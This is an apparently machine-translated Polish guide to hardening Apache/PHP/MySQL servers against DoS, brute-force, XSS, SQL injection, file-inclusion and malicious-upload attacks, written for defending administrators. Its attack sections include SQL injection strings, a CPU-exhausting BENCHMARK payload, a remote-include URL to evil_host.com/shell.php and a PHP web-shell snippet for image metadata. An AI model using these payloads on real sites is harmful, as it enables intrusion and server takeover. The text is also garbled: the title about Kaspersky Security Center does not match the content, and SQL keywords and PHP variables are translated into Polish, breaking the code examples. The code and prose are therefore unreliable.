Wdrażanie ochrony antywirusowej za pośrednictwem Kaspersky Security Center. Konfigurowanie ochrony antywirusowej Zbyt dużo czasu

W tym artykule chciałbym zebrać niektóre rodzaje ataków na serwery i sposoby ochrony serwera przed hakerami. Na temat bezpieczeństwa napisano wiele książek i artykułów. Nacisk w tym artykule położony jest na podstawowe błędy administratorów oraz rozwiązania pozwalające je wyeliminować. Po przeczytaniu tego artykułu i sprawdzeniu własnego serwera administrator również nie będzie mógł spać spokojnie, może jedynie stwierdzić, że przeszedłem „minimum kandydata”.

Pamiętaj administratorów trzy przysłowia,
NIE! lepiej je wydrukuj i powieś w miejscu pracy przed oczami:
"Bezpieczeństwo to proces",
"Kiedy administrator nie ma nic do roboty, zajmuje się bezpieczeństwem",
"Bezpieczeństwo definiuje najsłabsze ogniwo"
Artykuł jest skierowany do administratorów *nix + Apache + PHP + Perl + (MySQL | PostgreSQL) i ochrony serwerów przed zdalnymi atakami, dla innych administratorów mam nadzieję, że artykuł będzie do myślenia.
Różne książki mają różne klasyfikacje ataków hakerskich, ja wprowadzę swój własny podział na dwie warunkowe klasy WSZYSTKICH ataków, rozgrupuję je:

Atak na usługi, które są podatne na ataki i dostępne przez Internet

Aby zrozumieć mój podział, wyobraź sobie, że istnieje fikcyjny skrypt, który zdalnie atakuje Apache na porcie 80 iw wyniku ataku Apache się wyłącza, a ty zostajesz bez swojej witryny, ponieważ nie ma nikogo, kto udostępni strony internetowe. Twój serwer pocztowy sendmail otrzymał 1000 znaków zamiast krótkiej nazwy użytkownika jako parametr do VRFY, sendmail nie spodziewał się tego i zamknął, pozostawiając cię bez poczty. Ogólne znaczenie ataków tej klasy warunkowej jest takie, że wykorzystuje się pewną lukę w zabezpieczeniach aplikacji. A są trzy sposoby -

path1) aplikacja ulegnie awarii i usługa nie będzie dostępna, sytuacja DoS;
ścieżka 2) aplikacja zacznie przechwytywać zasoby, a po ich wyczerpaniu wykona atak DoS;
path3) aplikacja otrzyma kod powłoki i kod atakującego zostanie wykonany;

To wszystko są ataki na usługę (punkt 1) i są traktowane tylko w jeden sposób: administrator niezwłocznie dowiaduje się od dewelopera o obecności luki i aktualizuje ten program.

Atak na punkt 2 polega na tym, że usługa dynamiczna zaimplementowana w jakimś języku programowania umożliwia odbieranie parametrów i wykonuje je bez ich sprawdzania. Na przykład atakujący, korzystając z przeglądarki, przeszukując witrynę Apache, szuka luk w zabezpieczeniach samej witryny i wykorzystując je, uzyskuje to, czego chce. Napisany w Tcl bot do moderowania kanału serwera IRC otrzymuje żądania od użytkownika (numer nowego żartu, data dnia do wyświetlenia pogody) i hakera, odtwarzający działanie kodu programu bota (inżynieria wsteczna ), konstruuje żądania, które nie zostały uwzględnione przez autora bota.

Zapytaj jak to jest? to zdecydowanie potrzebujesz tego artykułu. Tak czy inaczej, tuż poniżej wszystko zostanie pomalowane.

Atak na podatne usługi i sam serwer

W tej sekcji opisałem wszystkie ataki, których wpływ spada na system i usługi. Często takie ataki są możliwe od błędów w realizacji programu, takich jak przepełnienie bufora (buffer overflow). W skrócie wygląda to tak, powiedzmy, że w źle napisanym serwerze ftp jest tablica (bufor) na nazwę użytkownika na określoną liczbę znaków (na przykład 10) i taki serwer ftp otrzymuje 100 znaków od chorego -wisher, jeśli taka sytuacja nie jest zaznaczona w kodzie serwera ftp, następuje przepełnienie bufora.

Czym więc jest lokalne przepełnienie bufora przydatne dla hakerów? Istnieje możliwość nadpisania adresu zwrotnego złośliwym kodem. Zdalnie pozwala to na wykonanie dowolnego kodu w systemie docelowym, lokalnie, jeśli program działa jako root, pozwoli na uzyskanie uprawnień administratora systemu.Kod powodujący przepełnienie bufora i wykonujący akcje dla hakera nazywa się shell kod.Napisanie kodu powłoki nie jest zadaniem łatwym i wymaga od hakera znajomości języka asemblera, co implikuje profesjonalizm w tej dziedzinie.

Ochrona przed atakami na wrażliwe usługi i sam serwer

Aktualizacja. Konieczne jest nauczenie się, jak zaktualizować cały system, a zatem umieć to zrobić
„zbuduj świat i jądro” dla *nix, aktualizuj przez system pakietów Linux i kliknij przycisk Aktualizuj w Windows Update dla licencjonowanego MS Windows. Administratorzy FreeBSD muszą mieć możliwość instalowania oprogramowania przy użyciu portów. W ten sposób będziesz żeglować z deweloperami, a nie przeciwko nim.
Administratorzy MS Windows muszą się przyzwyczaić i częściej korzystać z formatu dystrybucji MSI, który jest wysoce zalecany przez firmę Microsoft i umożliwia aktualizację starego pakietu do nowego. Cokolwiek robisz na swoim serwerze, zadaj sobie pytanie, czy jest dostępna nowa wersja tego programu, jak łatwo jest ją zaktualizować? Musisz stworzyć rozwiązanie, nad którym masz pełną kontrolę, tak, są projekty z własnymi opracowaniami lub łatami, ale jeśli Twoje opracowania wymagają zamrożenia aplikacji, których potrzebujesz na określonej wersji i nie możesz zastosować swoich poprawek do nowego systemu - takie rozwiązanie NIE jest warte!

Zrobię tu liryczną dygresję i opowiem, jak musiałam się przełamać. Po przeczytaniu artykułów w Internecie, które zwykle zaczynają się w ten sposób, „pobierz źródło i umieść je, aby zainstalować”. Więc co dalej? Jak zainstalujesz nową wersję? Zachować starą wersję, aby można było w niej (de|dez)instalować? A w nowym make install jeszcze raz? Te pytania zadał mój przyjaciel Dmitrij Dubrovin, kiedy zaczynaliśmy uczyć się FreeBSD. Zacząłem rozumieć, że miał rację i przynajmniej dla Free ta ścieżka nie jest odpowiednia, a nie podążając ścieżką twórców FreeBSD, tylko utrudniłem sobie sprawę.

Teraz, po opanowaniu FreeBSD, kiedy kilka poleceń pobiera nowe źródła dla jądra Free i całego systemu, wtedy kilka poleceń tworzy nowy Świat i jądro, a następnie aktualizowane są porty i aplikacje w systemie, zaczynasz rozumieć potęgę systemów * nix. Trudno wyrazić dumę, jaką czujesz, gdy aktualizujesz serwer z FreeBSD ze starej gałęzi do obecnej, przebudowujesz świat systemu, kiedy system kompiluje się sam z nowych źródeł (wygląda na to, że Munchausen ciągnął się za włosy) i wszystko który działał przed aktualizacją, działa również „bez pliku”.

Jak już zrozumiałeś, musisz subskrybować listy mailingowe dotyczące bezpieczeństwa od twórców oprogramowania obsługującego Twoją firmę i być okresowo aktualizowanym. Odnowienie wszystkiego i wszystkiego musi być udoskonalone i postawione na szynach.
Strojenie bezpieczeństwa. Większość systemów operacyjnych dla serwerów nie jest domyślnie skonfigurowana w stopniu wystarczającym do pracy w surowym „chemicznym” środowisku Internetu. Aby hakerzy „nie oszukiwali” na twoim serwerze, musisz wykonać tuning bezpieczeństwa, a mianowicie przeczytać zalecenia producenta systemu operacyjnego dotyczące bezpieczeństwa. Administratorzy systemów *nix mogą wezwać man security i po zapoznaniu się z radami twórców sprawić, by bajka się spełniła. Ale niezależnie od systemu operacyjnego, po dostrojeniu zabezpieczeń należy dokładnie przetestować działanie serwera i usług.
zapora ogniowa. Skonfigurowana zapora ogniowa, którą osobiście sprawdziłeś za pomocą skanerów portów nmap i skanerów luk w zabezpieczeniach, jeśli jest wyjście z tych programów, czy wszyscy rozumiecie, o co toczy się gra? Konfigurując zaporę ogniową, pamiętaj, że istnieją sposoby na ominięcie jej reguł. Na przykład istnieje sieć lokalna chroniona przez zaporę ogniową, ustawiając flagę zakazu fragmentacji pakietów, w pewnych sytuacjach możliwe jest dotarcie do miejsca docelowego w sieci lokalnej. Lub częsty błąd administratora, nadmierne zaufanie do wychodzących pakietów własnego serwera.
Wyobraź sobie prawdziwą sytuację, wrogi kod próbuje zainicjować połączenie z hostem hakera-właściciela, a ty masz regułę w zaporze ogniowej „wszystko jest dozwolone ode mnie do Internetu”. Tworząc reguły zapory, musisz w pełni zrozumieć cały obraz komunikacji sieciowej swoich usług między nimi a klientami zdalnymi.
System wykrywania włamań. Firewall można sobie wyobrazić jako kamienne mury w pobliżu zamku rycerskiego. Wzniesiony raz i siedzi w środku - suchy i wygodny. Ale co, jeśli ktoś już testuje wytrzymałość ścian z armaty? Może już musisz wyjrzeć z zamku i kogoś nadziać? Aby wiedzieć, co dzieje się za murami zamku, ci na zewnątrz, musisz mieć na serwerze system wykrywania włamań (IDS). Jeśli masz taki system oparty na paczce, którą lubisz, to jeśli ktoś zacznie strzelać z nmap guna, to będziesz świadomy, a atakujący też będzie świadomy „tego, co wiesz”.
Analiza sytuacji niestandardowych. W licznych logach w systemie często migają napisy „błąd: nieotwarty plik /etc/passwd” lub „odmowa dostępu”. To są małe dzwonki, które dzwonią o źle skonfigurowanej aplikacji, która nie może czegoś odczytać, gdzieś, a może to nie jest dzwonek, ale alarm bijący na alarm o hakerze, który jest w połowie drogi.
W każdym razie administrator powinien być świadomy takich rzeczy. Dla ułatwienia pracy administratora stworzone zostały programy, które przeanalizują logi pod kątem pojawiania się interesujących fraz i prześlą raport do administratora pocztą. Nie lekceważ takiej okazji, takie programy są porównywalne do strażników, którzy sprawdzają zaufaną ścieżkę, ale czy wszyscy zachowują się zgodnie z zaleceniami?
Usuń wersje oprogramowania. Usuń banery ze swoich usług. Nie, nie te banery, które pokazujesz na swojej stronie, ale te linie, które twoje programy wysyłają na powitanie podczas łączenia lub w wyniku błędu. Nie ma potrzeby świecić wersjami twoich programów, hakerzy przeszukują Internet w poszukiwaniu dostępnych programów wykorzystujących tę lub inną lukę (exploity - exploit) według wersji.
Nie ma tutaj jednego rozwiązania, na przykład, jeśli instalujesz określony program z portów, nie pisz make install clean, więc bez ciebie wszystko zostanie pobrane, skompilowane i zainstalowane. Lepiej zrób aport; zrobić ekstrakt; następnie przejdź do podkatalogu pliki i tam możesz poprawić wersję programu w źródłach lub przekazać ją jako inną i wtedy tylko wyczyścić instalację.

Apache jest bardzo informacyjny nie na miejscu i nadal błyszczy wersjami systemu, PHP, Perl, OpenSSL. Hańba jest wyłączana przez określenie dyrektyw w httpd.conf ServerSignature Off ServerTokens Prod. W Internecie można znaleźć pomoc przy zastępowaniu banerów dowolnym programem. Cel jest ten sam - pozbawienie atakującego cennych informacji. Patrząc na swoją listę usług dostępnych w Internecie, zadaj sobie pytanie, czy nie zdradza on zbyt wielu informacji o sobie i przechowywanych przez siebie informacjach.

Na przykład powiązanie serwera DNS może pozwolić na „przeniesienie strefy”, a twoje komputery z ich adresami IP i nazwami domen będą dostępne dla wszystkich, co jest złe. Sprawdź swój serwer za pomocą różnych skanerów i uważnie przeczytaj ich wyniki. Podczas wymiany banera programu radzę wstawić nie przypadkowy tekst, ale ostrzeżenie o odpowiedzialności i rejestrowaniu działań. Ponieważ zdarzały się incydenty, gdy haker został wypuszczony na salę sądową, ponieważ na zhakowanym serwerze FTP pojawił się napis „Witamy! Witamy!”.
Reguła minimalnych wymagań. Zminimalizuj dostępne usługi dla Internetu. Wyłącz to, czego nie potrzebujesz, ponieważ nie możesz zhakować tego, co jest wyłączone. Częsty błąd, na przykład, gdy serwer MySQL sparowany z Apache na tej samej maszynie jest skonfigurowany tak, aby był dostępny zdalnie na swoim standardowym porcie 3306. Dlaczego? Wydaj polecenie netstat -na | grep POSŁUCHAJ i odpowiedz sobie: czy wiesz, które programy używają którego interfejsu i jakiego portu? Czy jesteś pod kontrolą? Cóż, jeśli tak.
Wiele silnych i różnych haseł. Często w filmach o hackowaniu lub opowieściach hakerów o hackowaniu miga zdanie „dobrze, że admin miał jedno hasło do panelu administracyjnego, które też poszło do ssh i ftp”. Mam nadzieję, że tu nie chodzi o ciebie. Stąd zasada: hasła do różnych serwisów muszą być różne i mieć co najmniej 16 znaków. Niech zostaną spisane na kartce, jeśli boisz się zapomnieć (w tym miejscu specjaliści ds. hasło i podobieństwo do słowa ze słownika sprawiły, że stało się to możliwe.
Różne hasła dla różnych usług są łatwe do zrobienia, jeśli usługi będą autoryzować się nie jako użytkownicy systemowi w bazie danych /etc/passwd, ale jako wirtualni we własnych bazach planarnych lub DBMS. Nie przechowuj haseł na serwerach w pliku password.txt dla wszystkich zasobów, do których jako administrator masz dostęp.
Ograniczenie. Wszystkie twoje usługi na serwerze muszą być uruchamiane z różnych ograniczonych kont (kont) i nigdy nie mogą być uruchamiane z konta root. Uwierz mi, jeśli przejdą do eskalacji uprawnień z konta ograniczonego do statusu roota (uid=0, gid=0), zostaniesz uratowany przez brak znanych dziur w zaktualizowanym systemie.
Nawiasem mówiąc, wielu administratorów zapomina o czymś takim, dlaczego np. konta do uruchamiania Apache i MySQL powinny mieć dostęp do powłoki! W końcu można to wyłączyć i zamiast powłoki podać / bin / false. Cóż, szczerze, sprawdź swoje konta pod kątem programów na serwerze raportowania i powiedz mi, czy się mylę. W swoich bazach danych SQL ogranicz konta do minimum wymaganych uprawnień. Nie nadawaj uprawnień do PLIKU, gdy wywoływana jest tylko opcja SELECT.
Wszyscy do więzienia! Naucz się pracować z piaskownicami (sandbox) lub więzieniami (więzieniem) i uruchamiaj aplikacje w tych odizolowanych pomieszczeniach, to utrudni zhakowanie całego serwera. Jeśli korzystasz z wirtualizacji, możesz rozłożyć usługi na różne systemy operacyjne gościa.
Warstwowa obrona. Można zakazać czegoś na kilka sposobów w różnych miejscach - zrób to. NIGDY nie myśl - zabroniłem tu, tam zakazać zbędnego.

Dowiedz się więcej o atakach na podatne usługi i sam serwer.

Atak DoS (Denial of Service) - atak, którego celem jest zabicie jakichkolwiek ograniczonych zasobów serwera (kanał internetowy, pamięć RAM, procesor itp., itp.) tak, aby serwer nie mógł obsługiwać uprawnionych użytkowników. Mówiąc obrazowo, wyobraź sobie, że intruz zadzwonił do ciebie do domu i milczał przez telefon, i trwało to przez cały wieczór. Byłeś tym wszystkim zmęczony i wyłączyłeś telefon, a rano dowiedziałeś się, że przegapiłeś ważny telefon od szefa. Oto analogia z prawdziwe życie Ataki DoS.
W rzeczywistości DoS często wygląda tak, z powodu błędu w programie użycie procesora skacze i pozostaje na poziomie 100% przez długi czas, a atakujący okresowo wykorzystuje tę lukę w programie. Źle napisana aplikacja może zabraknąć pamięci RAM. Lub „bomba pocztowa” w postaci mocno skompresowanego pliku w archiwum z wieloma znakami [spacja], który zostanie rozpakowany do sprawdzenia przez program antywirusowy i rozpakowany ogromny plik przepełni partycję dysku twardego na serwerze i/lub spowodować ponowne uruchomienie serwera.

Ochrona przed atakami DoS:
- Aktualizowanie programu, który jest manipulowany w celu przeprowadzenia ataku DoS
- Ustaw limity zasobów dla konta, na którym działa ten program. *systemy nix umożliwiają dostosowanie procentowego wykorzystania procesora, pamięci RAM, liczby odradzanych procesów, otwartych plików itp. i tak dalej.
- Skonfiguruj logowanie w programie i spróbuj znaleźć atakującego-lalkarza i zablokować go w zaporze ogniowej.
- Skonfiguruj program zgodnie z zaleceniami programisty, guru, zgodnie z artykułami w Internecie, jeśli znajdziesz się w takiej sytuacji.
DDoS (ten sam DoS, ale jesteś atakowany z kilku komputerów zombie, na czele z
napastnik). DDoS są destrukcyjne i są używane tylko przez tych wandali, którzy mają stada maszyn zombie i będą żądać pieniędzy za powstrzymanie ataku lub uszkodzenie Twojego biznesu, aby użytkownicy bez dotarcia do Twojego serwera przeszli do konkurencji. Ataki DDoS nie są wykorzystywane przez hakerów, których celem jest intelektualne zhakowanie twojego serwera, tak, tak, twój serwer jest „tajemnicą”, którą chcą „rozwiązać”.
Jak chronić się przed DDoS? Jeśli polegasz na własnych siłach i środkach, to automatyzując pracę skryptów, możesz wyłowić adresy IP z różnych logów i wprowadzić je do zakazujących reguł zapory. Tak na przykład autor artykułu „Czy istnieje życie pod DDoS” zrobił tyle artykułów o tym, jak go skonfigurować, aby zminimalizować szkody spowodowane atakami DDoS.

Ochrona przed atakami DDoS:
- Jeśli atak DDoS jest skierowany na aplikację, spróbuj znaleźć w logach różnicę między atakującymi a uprawnionymi użytkownikami i automatyzując za pomocą skryptu, wpisz to w regułach zapory ogniowej w deny
- Jeśli atak DDoS jest skierowany na system (na przykład atak przez protokół ICMP), automatyzując za pomocą skryptu, dodaj go do reguł zapory sieciowej w odmowie
- Ustaw limity zasobów dla konta, na którym działa ten program. * systemy nix umożliwiają skonfigurowanie procentowego wykorzystania procesora, pamięci RAM, liczby odradzanych procesów, otwartych plików itp.
- Skonfiguruj program zgodnie z zaleceniami programisty, guru, zgodnie z artykułami w Internecie, jeśli znajdziesz się w takiej sytuacji
- Skontaktuj się ze swoim dostawcą, aby uzyskać pomoc w każdy możliwy sposób. Napisz skargę na adres abuse@host_of_networks_from_the_attack_domain. Pomoże to częściowo zniszczyć sieć atakującego, pozwoli mu ponieść szkody, kosztuje go to pieniądze. Doświadcz moralnej satysfakcji.
- Sprawdź mod_security dla Apache, to świetne narzędzie, które pomoże ci w niektórych sytuacjach.
Bruteforce atak na hasło. Tutaj nie można winić dziur w programach, po prostu z grubsza wybierają parę login / hasło. Ci, którzy opuścili serwer z skonfigurowanym ssh, ale zapomnieli ograniczyć dostęp przez ssh z określonych adresów IP i z określonymi loginami (dyrektywa w ssh_config AllowUser), musieli widzieć w logach próby brute-force hasła mash:password_machine.
Ochrona hasłem Bruteforce:
- Ogranicz liczbę nieudanych prób logowania/hasła
- Jeśli aplikacja na to pozwala, ustaw wydłużenie czasu przed nową próbą logowania / hasła.
- Jeśli z aplikacją ma pracować wąski krąg osób, stwórz taką regułę i ogranicz ją do

Atakuj poprzez dynamiczną zawartość serwisu

Ten typ ataku często występuje na grupie Apache + (PHP | PERL) + (MySQL | PostgreSQL) dla świata * nix oraz IIS + ASP + Microsoft SQL Server dla świata MS Windows za pomocą prostej przeglądarki, ale to tylko szczególny przypadek, który jest po prostu częściej używany ze względu na popularność sieci. W tym pakiecie języki programowania to ASP, PHP, Perl, SQL, więc hakerzy często będą wykorzystywać je do kompilowania swoich destrukcyjnych projektów.

ALE najważniejszą rzeczą do zrozumienia jest to, że takie więzadła usługa + dynamiczna zawartość na nich jest ich wiele w językach programowania i dlatego wszystkie są pod ostrzałem hakerów. Na przykład tutaj jest niepełna lista:

Serwer WWW + skrypty CGI
Starożytny link, który nie jest już używany - skrypty Apache + PHF (czyli P H F).
Serwer aplikacji IIS + ColdFusion
Mechanizm SSI (zawiera stronę serwera)

Następnie porozmawiamy głównie o hackach internetowych, ale nie zapominajmy, że wszystko opisane poniżej dotyczy innych pakietów usług + zawartości dynamicznej. Słowa są różne, ale istota jest ta sama. Dziś hakerzy atakują sieć za pomocą przeglądarki, jutro klientem R przeciwko usłudze Z. Serwer WWW, sam połączony z bazami danych i wieloma językami programowania, stał się platformą do tego typu ataków.

Celem wszystkich tego rodzaju ataków jest próba zbadania witryny za pomocą przeglądarki w celu znalezienia błędów w skryptach obsługujących dynamiczną zawartość (zawartość) witryny.

Stąd wniosek - włamanie się na stronę poprzez atak na sieć, na której znajdują się tylko statyczne strony html, które odnoszą się tylko do siebie, jest NIEMOŻLIWE. Ataki za pośrednictwem Twojej witryny sieci Web pojawiły się, gdy ludzie chcieli większej interaktywności i dodali ją za pomocą języków programowania i baz danych.

Hakerzy surfujący po serwisie zwracają szczególną uwagę na skrypty, którym przekazywany jest dowolny parametr. Ale co, jeśli autor skryptu nie sprawdzi, co dokładnie jest przekazywane jako wartość parametru?

Ogólne rozwiązania dla administratora przed atakami na dynamiczną zawartość serwisu (strona internetowa jako przypadek szczególny)

Aktualizacja. Już o tym rozmawialiśmy, ale jeśli korzystasz z rozwiązań stron trzecich (silników forów, galerii, czatów itp.), Będziesz otrzymywać raporty o lukach w zabezpieczeniach i dziurach w zabezpieczeniach. Zdaniem hakerów, jeśli portal działa z finansami i ich obrotami, to nie jest pożądane, aby taki portal miał cudze opracowania, z wyjątkiem własnych. Oczywiście należy rozumieć, że rozwój własnych silników dla witryny został napisany przez programistów, którzy wiedzą, jak bezpiecznie programować i rozumieją zagrożenia w Internecie.
Bądź niestandardowy. W wielu narzędziach hakerskich często migają bazy danych luk w zabezpieczeniach, forum/, galeria/, obrazy/ścieżki. Bardzo wygodnie! Znaj administratora, połowa z nich ogoli się i splunie na twoją stronę, jeśli twoja strona nie znajduje się na /usr/www, a twój administrator nie jest site.com/admin. Najważniejsze jest to, że jeśli nie jesteś standardem, jest to dodatkowa szprycha w kołach hakera, który atakuje Twoją witrynę. Będzie musiał dodać/poprawić w manualu bazę danych/skrypt. Ale czy haker zawsze może lub chce to zrobić? Młodzi hakerzy, „dzieciaki skryptów”, na pewno zostaną odstraszeni. Na przykład porady dotyczące bezpieczeństwa PHP
# Spraw, aby kod PHP wyglądał jak inne rodzaje kodu
AddType application/x-httpd-php .asp .py .pl
# Spraw, aby kod PHP wyglądał jak kody nieznanego typu
AddType application/x-httpd-php .bop .foo .133t
# Spraw, aby kod PHP wyglądał jak html
AddType application/x-httpd-php .html .htm

Ta forma zabezpieczenia PHP poprzez ukrywanie ma kilka wad przy niewielkich kosztach. Sami hakerzy, opisując swoje hacki, piszą, że pobierają to samo oprogramowanie, które znajduje się na twoim serwerze ze strony programisty i patrzą, z jakimi domyślnymi nazwami tabel / ścieżkami / tym lub innym silnikiem współpracuje. Ogólne znaczenie niestandardowych polega na opóźnieniu procesu hakowania, aby haker nie miał „blitzkriegu”, a im bardziej ciągnie, tym większe prawdopodobieństwo wykrycia.
Usuń wersje silników i skryptów na stronie. To cenna informacja, której atakujący powinien się pozbawić, znając wersję, której szuka, gotowych rozwiązań do hakowania. Zrób to tak, aby twoje skrypty nie wyświetlały błędów na błędach przydatna informacja, takie jak: ścieżka do skryptu, w którym wystąpił błąd (problem „ujawniania ścieżki”) oraz wynik samego błędu.
Rozważ potrzebę .htaccess. Obecność plików .htaccess oznacza, że możesz nadpisać opcje ustawione w głównej konfiguracji Apache, wierz mi, hakerzy właśnie to zrobią. Jeśli wyłączysz użycie .htaccess za pomocą dyrektywy „AllowOverride None”, uzyskasz korzyści w zakresie wydajności dla Apache, ponieważ nie będzie on przeglądał wszystkich katalogów na ścieżce do strony internetowej przy każdym żądaniu i zwiększy bezpieczeństwo serwer WWW Apache.

Więcej o atakach na zawartość dynamiczną (strona internetowa jako przypadek szczególny)

XSS (skrypty między witrynami).
Skrypty międzywitrynowe nazywają się XSS, a nie CSS, ponieważ CSS jest wczesnym akronimem „Cascading Style Sheets”. Ataki XSS nie są skierowane przeciwko serwerowi, ale przeciwko użytkownikom tego serwera. Ale administrator nie musi się radować! Atak XSS wygląda tak, strona posiada edytowalne pola na stronie WWW lub parametry skryptu, które nie są filtrowane na budowie formularza<, >, javascript.
Haker dodaje kod w języku programowania po stronie klienta, zwykle Java i VBScript, do edytowalnych pól, a ten kod staje się częścią strony HTML. Gdy użytkownik odwiedza taką stronę, jego przeglądarka analizuje stronę i wykonuje ten kod.
Co hakerzy robią z XSS?
- Kradzież ciasteczek (ciasteczek, bułek) – te pliki tekstowe przechowują informacje, które serwer „zadaje” użytkownikowi w celu jego późniejszej identyfikacji. W przykładzie, jeśli utworzysz plik test.html z tą zawartością (napiszesz go samodzielnie), to po uruchomieniu w przeglądarce wyświetli on XSS.
  Drogi administratorze, podczas odwiedzania strony wystąpił błąd
  Pomoc
  Ale możesz napisać skrypt w Javie i poważniej. Zazwyczaj takie skrypty są pisane na pocztę internetową administratora i za pomocą socjotechniki próbują nakłonić go do przeczytania wiadomości w celu uzyskania jego plików cookie.
  
  Jeśli w plikach cookie nie ma linku do adresu IP i dodatkowych zabezpieczeń, to podmieniają swoje pliki cookie na pliki administratora i próbują dostać się do panelu administratora, który nie sprawdza loginu i hasła, a identyfikuje osoby tylko po plikach cookie.
- deface serwisu (deface - zastąpienie strony startowej serwisu, najczęściej index.html)
- Trojanizacja zdalnego użytkownika. Do przeglądarek użytkowników wybierane są nowe exploity, a kiedy wchodzą na podatną na ataki stronę, podejmowana jest próba zainfekowania komputera trojanem. Jeśli użytkownik ma zainstalowany program antywirusowy ze świeżymi bazami danych, wskaże pojawienie się trojana w systemie. A Twoja strona spadnie w oczach użytkownika, być może już do Ciebie nie przyjdzie.
- DoS. Przy dużej liczbie odwiedzających skrypt dodatkowo zażąda więcej innych stron z twojego serwera lub z innego, ktoś może mieć DoS.
Rozwiązaniem problemu:
- Aby zablokować zapisywanie tagów html do bazy danych z pól wejściowych, użyj konstrukcji takich jak htmlspecialchars dla PHP, które zastąpią< на <, >do >, & do & i tak dalej
  Przykład,
  $komentarz = htmlspecialchars($komentarz, ENT_CYTATY);
  $query = "wstaw do księgi gości
  (nazwa, lokalizacja, adres e-mail, adres URL, komentarz).
  ("$nazwa", "$lokalizacja", "$e-mail", "$url", "$komentarz")";
  mysql_query($zapytanie) lub die(mysql_error());
- Sprawdź i przefiltruj w swoich skryptach wszystkie parametry, które wprowadza użytkownik i które są przekazywane do skryptu przez pasek adresu. Dowiedz się, jak prawidłowo używać wyrażeń regularnych do analizowania przychodzących danych. W przypadku swojego języka programowania znajdź materiały, które uczą, jak bezpiecznie kodować.
- Jeśli chcesz korzystać z technologii plików cookie w swojej witrynie, przeczytaj nasze Zasady bezpieczeństwa dotyczące plików cookie. Ogranicz ich działania w czasie i adresach IP.
- Jako administrator bądź czujny, gdy zostaniesz oszukany przez inżynierię społeczną. Nie zapomnij o bezpieczeństwie komputera osobistego za komputerem klienckim.
wstrzyknięcie SQL. wstrzyknięcie SQL.
Ta choroba oznacza, że niezaznaczony parametr jest zastępowany w zapytaniu SQL, które pojawia się w skrypcie. Haker w prosty sposób znajduje skrypty cierpiące na iniekcję SQL, do wartości parametru dodaje się cytat site.com/view.php?id=1" lub parametr numeryczny jest modyfikowany w taki sposób, jak ten site.com/view.php? identyfikator=2-1.
Jeśli podstawiony cytat powoduje „błąd” (dużo komunikatów, że takie a takie żądanie nie jest wykonywane w takim a takim skrypcie wzdłuż takiej ścieżki), to taki skrypt jest kandydatem do pompowania go dalej. Często atakujący używają hacka Google, prosząc wyszukiwarkę o coś w stylu „strona: www.victim.ru Ostrzeżenie”. Wyszukiwarka Google zwróci nieprawidłowe skrypty na Twojej stronie, tak stare, że od dawna są indeksowane przez pająka Google .

Kod, który nie sprawdza wartości i cierpi na iniekcję SQL
$id = $_REQUEST["identyfikator"];
$result = mysql_query("WYBIERZ tytuł, tekst, datenews, autora FROM `news` WHERE `id`="$id"");

Teraz wyobraź sobie, że zamiast liczby zostaniesz zastąpiony „-1 union select null/*” (bez cudzysłowów), a następnie zapytanie zmieni się w
WYBIERZ tytuł, tekst, datenews, autora Z `news` GDZIE `id`="-1 union wybierz null/*"

Oznacza to, że haker chce, aby jego żądanie zostało wykonane oprócz twojego żądania, połączonego z twoim za pomocą dyrektywy union. A wtedy haker będzie próbował wykonać inne zapytania, a biorąc pod uwagę moc języka SQL, nie wróży to dobrze administratorowi. Od deface (deface - zastąpienie strony startowej serwisu) do uzyskania uprawnień roota na twoim serwerze. Haker może również przeprowadzić atak DoS dzięki SQL injection: site.com/getnews.php?id=BENCHMARK(10000000,BENCHMARK(10000000, md5(current_date))) kilka takich żądań i serwer jest na 100% CPU ładować przez długi czas.

Ochrona przed wstrzyknięciem SQL:
- Szerokie wykorzystanie funkcji programu SQL Server, takich jak widoki i procedury składowane. Ograniczy to nieautoryzowany dostęp do bazy danych.
- Przed przekazaniem parametru do żądania należy sprawdzić jego typ (dla PHP - is_bool(), is_float(), is_int(), is_string(), is_object(), is_array() i is_integer()) oraz przynajmniej , cytowane przy użyciu konstrukcji typu addlashes dla PHP.
- Wszystkie skrypty współpracują z bazą danych z jakiegoś konta bazy danych, usuń wszystkie uprawnienia z tego konta, które nie są potrzebne do pracy. Często hakerzy używają polecenia MySQL (MySQL jest brane jako przykład, dotyczy to dowolnego serwera SQL) „LOAD DATA INFILE”, aby odczytać potrzebne pliki z serwera i konta do odczytu, na którym działa MySQL. Stąd wniosek, wyłącz niepotrzebne uprawnienia dla swoich skryptów, takie jak FILE, które są potrzebne do użycia polecenia LOAD DATA INFILE. Za podstawę należy przyjąć zasadę „podstawowego minimum”.
- Konto systemowe, na którym działa serwer SQL, nie powinno mieć dostępu do stron serwisu i plików systemowych serwera.
Łączenie plików. Dołącz plik. Powiedzmy, że istnieje strona site.com/getnews.php?file=190607, ale autor skryptu, używając include, łączy się ze stroną bez kontroli.
$plik = $_REQUEST["plik"];
include($plik.".html");
Haker zastąpi zły_host.com/shell.php zamiast 190607, a następnie cały pasek adresu przeglądarki hakera będzie wyglądał tak, jak ten site.com/postnews.php?file=evil_host.com/shell.php, a haker będzie miał własną powłokę internetową na swojej stronie z prawami, które ma Apache.

Ochrona połączenia plików:
- Sprawdź i przefiltruj w swoich skryptach wszystkie parametry, które wprowadza użytkownik i które są przekazywane do skryptu przez pasek adresu. W przypadku swojego języka programowania znajdź materiały, które uczą, jak bezpiecznie kodować.
- Hakerzy bardzo lubią, gdy język programowania na stronie pozwala na uruchamianie poleceń systemowych. Dlatego musisz zakazać wywoływania takich funkcji w swoim języku programowania, jeśli oczywiście jest to możliwe. Na przykład w ustawieniach PHP można określić listę "zabronionych" funkcji za pomocą funkcji disable_functions w pliku php.ini.
obraz trojana
Jeśli masz możliwość wgrywania plików na serwer w serwisie, przygotuj się na wgranie np. zdjęć avatara. W obrazie w formacie JPEG istnieje koncepcja metadanych (pamiętaj, gdzie aparat zapisuje informacje podczas fotografowania kadru) i te metadane zostaną zapisane
";passthru($_GET["cmd"]);echo ""; ?>
obraz zostanie przemianowany na avatara.jpg.php, aby ominąć większość kontroli rozszerzeń i będzie używał site.com/upload_images/avatara.jpg.php?cmd=server_commands

Ochrona przed trojanami:
- Sprawdź prawidłowo rozszerzenie pliku. Nawet jeśli prawidłowo przetwarzasz dozwolone pliki, przygotuj się na zmianę nazwy obrazu z jpg na php przy użyciu innej luki w zabezpieczeniach Twojej witryny. Sprawdź metadane w obrazie za pomocą funkcji takich jak exif_read_data() w PHP.
